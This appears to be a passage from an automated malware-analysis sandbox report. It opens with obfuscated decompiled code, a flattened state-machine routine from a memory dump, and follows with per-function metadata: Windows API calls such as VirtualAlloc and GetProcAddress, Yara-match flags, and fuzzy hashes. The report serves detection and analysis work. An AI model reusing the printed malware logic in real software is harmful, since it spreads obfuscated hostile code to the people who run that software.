				_v1700 = _v1700 / _t449;
				_v1700 = _v1700 ^ 0xb8dd2e27;
				_v1700 = _v1700 + 0x1cb3;
				_v1700 = _v1700 ^ 0xb8dbb093;
				_v1588 = 0x57c273;
				_v1588 = _v1588 ^ 0xbac546e2;
				_v1588 = _v1588 ^ 0xba9f2ece;
				_v1652 = 0x72d309;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 + 0x1eac;
				_v1652 = _v1652 ^ 0x0008e8eb;
				_v1728 = 0xc706e;
				_v1728 = _v1728 << 1;
				_v1728 = _v1728 << 0xc;
				_t450 = 0x26;
				_v1728 = _v1728 * 0x45;
				_v1728 = _v1728 ^ 0x49b77e5b;
				_v1640 = 0x7522e5;
				_t203 =  &_v1640; // 0x7522e5
				_v1640 =  *_t203 * 0x5c;
				_t205 =  &_v1640; // 0x7522e5
				_v1640 =  *_t205 / _t450;
				_v1640 = _v1640 ^ 0x0119d43e;
				_v1692 = 0xbb4804;
				_v1692 = _v1692 + 0xffff70c6;
				_v1692 = _v1692 << 0xf;
				_v1692 = _v1692 + 0x3f9;
				_v1692 = _v1692 ^ 0x5c613920;
				_v1712 = 0x28f594;
				_t451 = 0x4e;
				_v1712 = _v1712 * 0x7e;
				_v1712 = _v1712 / _t451;
				_v1712 = _v1712 | 0x51c800e0;
				_v1712 = _v1712 ^ 0x51cdbf54;
				_v1580 = 0x7adb62;
				_v1580 = _v1580 + 0x1c1;
				_v1580 = _v1580 ^ 0x0077f071;
				_v1720 = 0xc70a86;
				_v1720 = _v1720 << 7;
				_t452 = 0x56;
				_v1720 = _v1720 * 0x1f;
				_v1720 = _v1720 ^ 0x9dec4920;
				_v1720 = _v1720 ^ 0x90c44137;
				_v1704 = 0x9ba56a;
				_v1704 = _v1704 >> 0x10;
				_v1704 = _v1704 | 0x058efec6;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0xb1d841ad;
				_v1612 = 0x4e3e19;
				_v1612 = _v1612 | 0x42034613;
				_v1612 = _v1612 + 0xa5db;
				_v1612 = _v1612 ^ 0x4251fd7d;
				_v1596 = 0xecd59;
				_v1596 = _v1596 << 0xf;
				_v1596 = _v1596 ^ 0x66a56977;
				_v1632 = 0xfd16cc;
				_v1632 = _v1632 >> 0x10;
				_v1632 = _v1632 | 0xf759e487;
				_v1632 = _v1632 ^ 0xf75ce35e;
				_v1568 = 0xf13a15;
				_v1568 = _v1568 + 0xffffe5fa;
				_v1568 = _v1568 ^ 0x00f08e2f;
				_v1696 = 0xb25c71;
				_v1696 = _v1696 >> 5;
				_v1696 = _v1696 + 0xffff6fed;
				_v1696 = _v1696 | 0x9a7ee50f;
				_v1696 = _v1696 ^ 0x9a75ce05;
				_v1584 = 0xd4d15a;
				_v1584 = _v1584 | 0xed45407c;
				_v1584 = _v1584 ^ 0xedd29953;
				_v1648 = 0x645714;
				_v1648 = _v1648 / _t452;
				_v1648 = _v1648 ^ 0xa5463a61;
				_v1648 = _v1648 ^ 0xa540957b;
				_v1592 = 0x7bc2a2;
				_v1592 = _v1592 | 0xe79bdf7f;
				_v1592 = _v1592 ^ 0xe7f9ba68;
				_v1608 = 0xeb425b;
				_v1608 = _v1608 | 0x6f37f89f;
				_v1608 = _v1608 ^ 0x6ff0358e;
				_v1616 = 0xd90b05;
				_v1616 = _v1616 + 0x5fe2;
				_v1616 = _v1616 + 0xb3d9;
				_v1616 = _v1616 ^ 0x00d0b302;
				_v1628 = 0x5d6f98;
				_v1628 = _v1628 ^ 0x53a08d2a;
				_t453 = 0x1a;
				_v1628 = _v1628 * 0x15;
				_v1628 = _v1628 ^ 0xe3d40ccf;
				_v1656 = 0x3ffc42;
				_v1656 = _v1656 | 0xeccb51bd;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 / _t453;
				_v1656 = _v1656 ^ 0x004cf9e1;
				_v1604 = 0xad51da;
				_v1604 = _v1604 + 0xffffadf7;
				_v1604 = _v1604 ^ 0x00a3928b;
				_t498 = _v1604;
				while(_t492 != 0x1e2f185) {
					if(_t492 == 0x2b93872) {
						_t498 = E01217E66();
						_t492 = 0x31259bb;
						continue;
					}
					if(_t492 == 0x31259bb) {
						_t429 = _t498;
						__eflags =  *_t498 - _t442;
						if(__eflags == 0) {
							L17:
							_t492 = 0xc3103c3;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t429 - 0x2c;
							if( *_t429 != 0x2c) {
								goto L16;
							}
							_t491 =  &_v1560;
							while(1) {
								_t429 =  &(_t429[1]);
								_t461 =  *_t429 & 0x0000ffff;
								__eflags = _t461;
								if(_t461 == 0) {
									break;
								}
								__eflags = _t461 - 0x20;
								if(_t461 == 0x20) {
									break;
								}
								 *_t491 = _t461;
								_t491 =  &(_t491[0]);
								__eflags = _t491;
							}
							_t453 = 0;
							__eflags = 0;
							 *_t491 = 0;
							L16:
							_t429 =  &(_t429[1]);
							__eflags =  *_t429 - _t442;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t492 == 0x735677c) {
						_push(_t453);
						E0122EA55(_t498, _v1608, __eflags, _v1616, _t442, _v1628, _t442, _v1656, _v1604, _t442);
						_t442 = 1;
						__eflags = 1;
						L23:
						return _t442;
					}
					if(_t492 == 0x849210b) {
						E0121B3B4(_v1564, _t453, _v1676, _t453, _v1700,  &_v1040, _v1588, _v1572);
						E0122855C( &_v520, _v1652, __eflags, _v1728, _v1640, _v1564, _v1692);
						_push(_v1720);
						_push(_v1580);
						E01222EA5( &_v520, __eflags,  &_v1040, 0x12110f0, _v1612, _v1596, E0122CD35(0x12110f0, _v1712, __eflags), _v1632, _v1568, _t498);
						_t453 = _v1696;
						E0122629F(_t453, _t435, _v1584, _v1648, _v1592);
						_t499 =  &(_t499[0x18]);
						_t492 = 0x735677c;
						continue;
					}
					_t509 = _t492 - 0xc3103c3;
					if(_t492 == 0xc3103c3) {
						_push(_v1624);
						_push(_v1724);
						_t440 = E01212C3A(_v1684,  &_v1560, _v1716, E0122CD35(0x1211070, _v1576, _t509), _v1660); // executed
						_t453 = _v1668;
						asm("sbb edi, edi");
						_t492 = ( ~_t440 & 0xfc429d7e) + 0xc06838d;
						E0122629F(_t453, _t439, _v1708, _v1600, _v1620);
						_t499 =  &(_t499[8]);
					}
					L20:
					if(_t492 != 0xc06838d) {
						continue;
					}
					goto L23;
				}
				_t453 = _v1664;
				E0122365D(_t453,  &_v1560, _v1672, 0x208, _v1636, _v1644);
				_t499 =  &(_t499[4]);
				_t492 = 0x2b93872;
				goto L20;
			}


































































                          0x01231291
                          0x01231297
                          0x012312a4
                          0x012312af
                          0x012312ba
                          0x012312c2
                          0x012312ca
                          0x012312cf
                          0x012312d7
                          0x012312df
                          0x012312e7
                          0x012312ec
                          0x012312fa
                          0x012312fe
                          0x01231300
                          0x01231308
                          0x0123130d
                          0x01231315
                          0x0123131d
                          0x01231325
                          0x0123132d
                          0x01231335
                          0x0123133d
                          0x01231341
                          0x01231349
                          0x01231351
                          0x01231359
                          0x0123135e
                          0x01231366
                          0x0123136e
                          0x01231376
                          0x0123137b
                          0x01231383
                          0x01231388
                          0x01231390
                          0x0123139b
                          0x012313a6
                          0x012313b1
                          0x012313bf
                          0x012313c4
                          0x012313ca
                          0x012313d3
                          0x012313d8
                          0x012313de
                          0x012313e6
                          0x012313ee
                          0x012313f2
                          0x012313f7
                          0x012313ff
                          0x01231407
                          0x0123140c
                          0x01231414
                          0x0123141c
                          0x01231424
                          0x0123142c
                          0x01231434
                          0x0123143c
                          0x01231444
                          0x0123144c
                          0x01231454
                          0x0123145c
                          0x01231464
                          0x01231467
                          0x0123146b
                          0x01231473
                          0x01231483
                          0x01231488
                          0x0123148e
                          0x01231496
                          0x0123149b
                          0x012314a3
                          0x012314ab
                          0x012314b3
                          0x012314b8
                          0x012314bd
                          0x012314c5
                          0x012314d7
                          0x012314dc
                          0x012314e5
                          0x012314f0
                          0x012314fb
                          0x01231502
                          0x0123150d
                          0x01231518
                          0x01231523
                          0x0123152e
                          0x01231539
                          0x01231541
                          0x01231546
                          0x0123154b
                          0x01231553
                          0x0123155b
                          0x01231567
                          0x0123156c
                          0x01231572
                          0x0123157a
                          0x01231582
                          0x0123158a
                          0x01231595
                          0x012315a0
                          0x012315ab
                          0x012315b3
                          0x012315b8
                          0x012315c0
                          0x012315c8
                          0x012315d0
                          0x012315d4
                          0x012315de
                          0x012315e1
                          0x012315e5
                          0x012315ed
                          0x012315f5
                          0x012315fa
                          0x012315fe
                          0x01231606
                          0x0123160a
                          0x01231612
                          0x0123161a
                          0x01231622
                          0x01231627
                          0x0123162f
                          0x01231637
                          0x01231644
                          0x01231645
                          0x0123164f
                          0x01231653
                          0x0123165d
                          0x01231665
                          0x01231670
                          0x0123167b
                          0x01231686
                          0x0123168e
                          0x0123169a
                          0x0123169d
                          0x012316a1
                          0x012316a9
                          0x012316b1
                          0x012316b9
                          0x012316be
                          0x012316c6
                          0x012316cb
                          0x012316d3
                          0x012316de
                          0x012316e9
                          0x012316f4
                          0x012316ff
                          0x0123170a
                          0x01231712
                          0x0123171d
                          0x01231725
                          0x0123172a
                          0x01231732
                          0x0123173a
                          0x01231745
                          0x01231750
                          0x0123175b
                          0x01231763
                          0x01231768
                          0x01231770
                          0x01231778
                          0x01231780
                          0x0123178b
                          0x01231796
                          0x012317a1
                          0x012317b1
                          0x012317b5
                          0x012317bd
                          0x012317c5
                          0x012317d0
                          0x012317db
                          0x012317e6
                          0x012317f1
                          0x012317fc
                          0x01231807
                          0x01231812
                          0x0123181d
                          0x01231828
                          0x01231833
                          0x0123183b
                          0x01231848
                          0x01231849
                          0x0123184d
                          0x01231855
                          0x0123185d
                          0x01231865
                          0x01231870
                          0x01231874
                          0x0123187c
                          0x01231887
                          0x01231892
                          0x0123189d
                          0x012318a4
                          0x012318b6
                          0x01231a70
                          0x01231a72
                          0x00000000
                          0x01231a72
                          0x012318c2
                          0x01231a1e
                          0x01231a20
                          0x01231a24
                          0x01231a59
                          0x01231a59
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01231a26
                          0x01231a26
                          0x01231a26
                          0x01231a2a
                          0x00000000
                          0x00000000
                          0x01231a2c
                          0x01231a41
                          0x01231a41
                          0x01231a44
                          0x01231a47
                          0x01231a4a
                          0x00000000
                          0x00000000
                          0x01231a35
                          0x01231a39
                          0x00000000
                          0x00000000
                          0x01231a3b
                          0x01231a3e
                          0x01231a3e
                          0x01231a3e
                          0x01231a4c
                          0x01231a4c
                          0x01231a4e
                          0x01231a51
                          0x01231a51
                          0x01231a54
                          0x01231a54
                          0x00000000
                          0x01231a26
                          0x012318ce
                          0x01231ab3
                          0x01231ad9
                          0x01231ae3
                          0x01231ae3
                          0x01231ae7
                          0x01231af0
                          0x01231af0
                          0x012318da
                          0x0123197a
                          0x0123199a
                          0x0123199f
                          0x012319a8
                          0x012319ec
                          0x01231a08
                          0x01231a0c
                          0x01231a11
                          0x01231a14
                          0x00000000
                          0x01231a14
                          0x012318dc
                          0x012318e2
                          0x012318e8
                          0x012318f1
                          0x01231917
                          0x01231934
                          0x01231938
                          0x01231940
                          0x01231946
                          0x0123194b
                          0x0123194b
                          0x01231aa5
                          0x01231aab
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01231ab1
                          0x01231a94
                          0x01231a98
                          0x01231a9d
                          0x01231aa0
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 9a\$ Uk$#lp$$[B$^6$|@E$"u$_
                          • API String ID: 0-1868176208
                          • Opcode ID: 0c0b3c3cd84b92acd6cc99319d30926df958f00c8b4a41b36608d31d04748347
                          • Instruction ID: c3359b627419638a95201c2b0d99ea1ee68bc6e3f983ad8f247d43896162b29d
                          • Opcode Fuzzy Hash: 0c0b3c3cd84b92acd6cc99319d30926df958f00c8b4a41b36608d31d04748347
                          • Instruction Fuzzy Hash: 8B1211725093809FE368CF24C58AA4BBBF2FBD5754F10891DE2DA86260D7B58959CF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F249990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F249B65
                          • GetLastError.KERNEL32 ref: 6F249B6B
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6F249B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocCreateErrorFileLastVirtual
                          • String ID: asd
                          • API String ID: 1112224254-4170839921
                          • Opcode ID: 00a12d5202a4ecd9f9fb0fbf928d1bc4a4851b98e99107d2aa0ea058bd7867fe
                          • Instruction ID: f4108754eab2d4e9ac388403ad67c47e0d214c2c95e6928dd6d301875e4c9346
                          • Opcode Fuzzy Hash: 00a12d5202a4ecd9f9fb0fbf928d1bc4a4851b98e99107d2aa0ea058bd7867fe
                          • Instruction Fuzzy Hash: F4E1CB71A0831A8FCB18CF18CA80B5AB7E1FF88715F18456DE8558B389D7B1E865CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F231290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F2497D6
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F2497F4
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F24980D
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F24980F
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F249816
                            • Part of subcall function 6F2497A0: GetTickCount64.KERNEL32 ref: 6F249834
                          • GetProcessHeap.KERNEL32 ref: 6F231337
                          • HeapAlloc.KERNEL32(01310000,00000000,00023000), ref: 6F231351
                          • HeapFree.KERNEL32(00000000,?), ref: 6F231435
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick$Heap$AllocFreeProcess
                          • String ID: '`Ly
                          • API String ID: 2047189075-560155178
                          • Opcode ID: 47bd0a29ca4355796e9b3970fcd1aff986b238c643306d7e1e9563b57cb3eeb5
                          • Instruction ID: 21eb445beaa81419ac611e92b8820783168da9285c309fc0aefca7a345e567c8
                          • Opcode Fuzzy Hash: 47bd0a29ca4355796e9b3970fcd1aff986b238c643306d7e1e9563b57cb3eeb5
                          • Instruction Fuzzy Hash: 4851A9B1A04B448BD3248F24D980B56BBF4FF49318F108A2DD8968BB85E734F554CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24A21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6F24A262
                          • ___scrt_uninitialize_crt.LIBCMT ref: 6F24A27C
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 533ffa91708818e1c101db8f333fd55ff948909e9572fab07f79922fcb47e7ee
                          • Instruction ID: f63de016dcd4dca02419ac4c65d4a0add283ce2de1a2ffd47ea419e6a8f3c239
                          • Opcode Fuzzy Hash: 533ffa91708818e1c101db8f333fd55ff948909e9572fab07f79922fcb47e7ee
                          • Instruction Fuzzy Hash: D441E172D0572DEBDB19DF64C800BAE3BB5EF41BA9F00413AE8219B680D7F459519FA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24A2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 7283617c629b340b5f48d3de658ada62b46e3d8164a7c73d3004fe3633d04a32
                          • Instruction ID: 3a53f4e478345455e816d8a96a14ed50892cd85582efde1c1573cab25c8cb88b
                          • Opcode Fuzzy Hash: 7283617c629b340b5f48d3de658ada62b46e3d8164a7c73d3004fe3633d04a32
                          • Instruction Fuzzy Hash: 2821D172D0162EABDB298F14C840EAF3E79EF81B94F004135FC255B240E3B99D519FA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6F23C465
                          • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6F23C475
                          Strings
                          • api-ms-win-core-synch-l1-2-0, xrefs: 6F23C460
                          • WakeByAddressSingle, xrefs: 6F23C46F
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1731903895
                          • Opcode ID: 3654d53347beebf3f7d0a79b3fc72e7046d67aa61c9330e474ba70563f5e2553
                          • Instruction ID: ed2b5b3f73068bf8911d29c6733ba39bf25b382fb684a756f17f19d509fcef4b
                          • Opcode Fuzzy Hash: 3654d53347beebf3f7d0a79b3fc72e7046d67aa61c9330e474ba70563f5e2553
                          • Instruction Fuzzy Hash: 49B092B0A58959679EA06B714D0CBA63A6AE98262234184A1A261D14C0CEB09024DD22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6F23C4E5
                          • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6F23C4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1891578837
                          • Opcode ID: b591aa24b6a62e78f214751886e23bd34e99a154251688fc756805f8a0916e5f
                          • Instruction ID: cedb60146577842938987a239d14c587abc380d8253a1873a0515a05d4c60220
                          • Opcode Fuzzy Hash: b591aa24b6a62e78f214751886e23bd34e99a154251688fc756805f8a0916e5f
                          • Instruction Fuzzy Hash: FFB092B0A28A5A679EB06B724E0CBA63A6AE9516263428451E512E1480CEB4C024DD22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24A114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6F24A161
                            • Part of subcall function 6F24A7ED: InitializeSListHead.KERNEL32(6F28B140,6F24A16B,6F287D60,00000010,6F24A0FC,?,?,?,6F24A324,?,00000001,?,?,00000001,?,6F287DA8), ref: 6F24A7F2
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F24A1CB
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: 497b986fb7d9434b7dc61d36a2c87367c165c58edff1d15206ee017294f203d0
                          • Instruction ID: b29d443f5ca6f869417950ae5524ac10ee133e28b2345f150b4ba51baa2ca838
                          • Opcode Fuzzy Hash: 497b986fb7d9434b7dc61d36a2c87367c165c58edff1d15206ee017294f203d0
                          • Instruction Fuzzy Hash: CE21023254974D9AEF0DAFB4C4057DD37A19F0232DF104439C4A56BAC2DBF21055DEA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F25209C, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 6F2520E8
                          • GetFileType.KERNELBASE(00000000), ref: 6F2520FA
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: 3d33235caa0ecd4093a5301a19c1db4b3f41f011c2b766ef80284cf113885260
                          • Instruction ID: 084cec8a9fb13718c19873009feb178969a532777c9828b86fd8656be231ffc9
                          • Opcode Fuzzy Hash: 3d33235caa0ecd4093a5301a19c1db4b3f41f011c2b766ef80284cf113885260
                          • Instruction Fuzzy Hash: C5110AF111470A46CF304F3E8D88A53BA95AB67371B24470EE1B6D65F2C330E0AACE45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01212C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 01212CBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: 7e5980fc475ae66f08f90228868784197a6dd866653b1d07aab4bcbd929bd314
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: C0015675D1020CBBDB04DFD5994A99EBFB4EF04210F00C088E81966220D7719B109B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250566, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,6F25017F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6F24A44C,?,?,6F2499B4), ref: 6F2505A7
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ccbc769ce3c0cd56a5141feb1046a2dd2141d8c713b3dc105affc158d0b94109
                          • Instruction ID: 709dc2c674503ee0f2ed9c1fb6acd1694afbd72eb3925e39b237d96601b26f0b
                          • Opcode Fuzzy Hash: ccbc769ce3c0cd56a5141feb1046a2dd2141d8c713b3dc105affc158d0b94109
                          • Instruction Fuzzy Hash: 02F0B43250472FA7AB25DB36CD04A9B3748BF42779B006122EC14E75C0CF60F9308EA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24FC29, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,6F24A44C,?,?,6F2499B4,00000400,FFFDD001,?,?,?), ref: 6F24FC5B
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: c03d503d2de919f5e2ea6256bd1b204f33c4d46264289348fa5586ececc2e310
                          • Instruction ID: e45cdd332803a72f01df6b84ea5d66ecec145b6188e688692021a12512556ca8
                          • Opcode Fuzzy Hash: c03d503d2de919f5e2ea6256bd1b204f33c4d46264289348fa5586ececc2e310
                          • Instruction Fuzzy Hash: 02E0653118A62E97FB19D765ED04B97768CDFC27B5F010221ECA4979C1CFD0E4108DA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24CCF1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,6F24F75B,?,?,?,?,?,?,00000000,?,00000000,?,?,6F2527EE,?,}&%o), ref: 6F24F57F
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
